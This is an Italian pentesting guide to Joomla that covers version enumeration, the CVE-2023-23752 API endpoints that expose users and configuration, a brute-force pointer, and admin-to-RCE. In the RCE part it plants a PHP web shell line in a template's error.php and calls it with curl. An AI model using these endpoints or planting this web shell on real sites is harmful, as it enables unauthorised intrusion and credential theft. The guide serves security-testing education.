Joomla
Statistiche di Joomla
Joomla raccoglie alcune statistiche sull'uso anonime come la suddivisione delle versioni di Joomla, PHP e del database e i sistemi operativi del server in uso nelle installazioni di Joomla. Questi dati possono essere interrogati tramite la loro API.
Enumerazione
Scoperta/Footing
Controlla il meta
robots.txt
README.txt
Version
In /administrator/manifests/files/joomla.xml puoi vedere la versione.
In /language/en-GB/en-GB.xml puoi ottenere la versione di Joomla.
In plugins/system/cache/cache.xml puoi vedere una versione approssimativa.
Automatic
In 80,443 - Metodologia di Pentesting Web è una sezione sui CMS scanners che possono scansionare Joomla.
Divulgazione non autenticata delle informazioni dell'API:
Le versioni da 4.0.0 a 4.2.7 sono vulnerabili alla divulgazione non autenticata delle informazioni (CVE-2023-23752) che consentirà di scaricare credenziali e altre informazioni.
Utenti:
http://<host>/api/v1/users?public=true
File di configurazione:
http://<host>/api/index.php/v1/config/application?public=true
Modulo MSF: scanner/http/joomla_api_improper_access_checks
o script ruby: 51334
Forza bruta
Puoi utilizzare questo script per tentare un attacco di forza bruta al login.
RCE
Se sei riuscito a ottenere le credenziali admin puoi eseguire RCE al suo interno aggiungendo un frammento di codice PHP per ottenere RCE. Possiamo farlo personalizzando un template.
Clicca su
Templates
in basso a sinistra sottoConfiguration
per visualizzare il menu dei template.Clicca su un nome di template. Scegliamo
protostar
sotto l'intestazione della colonnaTemplate
. Questo ci porterà alla paginaTemplates: Customise
.Infine, puoi fare clic su una pagina per visualizzare il codice sorgente. Scegliamo la pagina
error.php
. Aggiungeremo una riga di codice PHP per eseguire il codice come segue:system($_GET['cmd']);
Salva e Chiudi
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated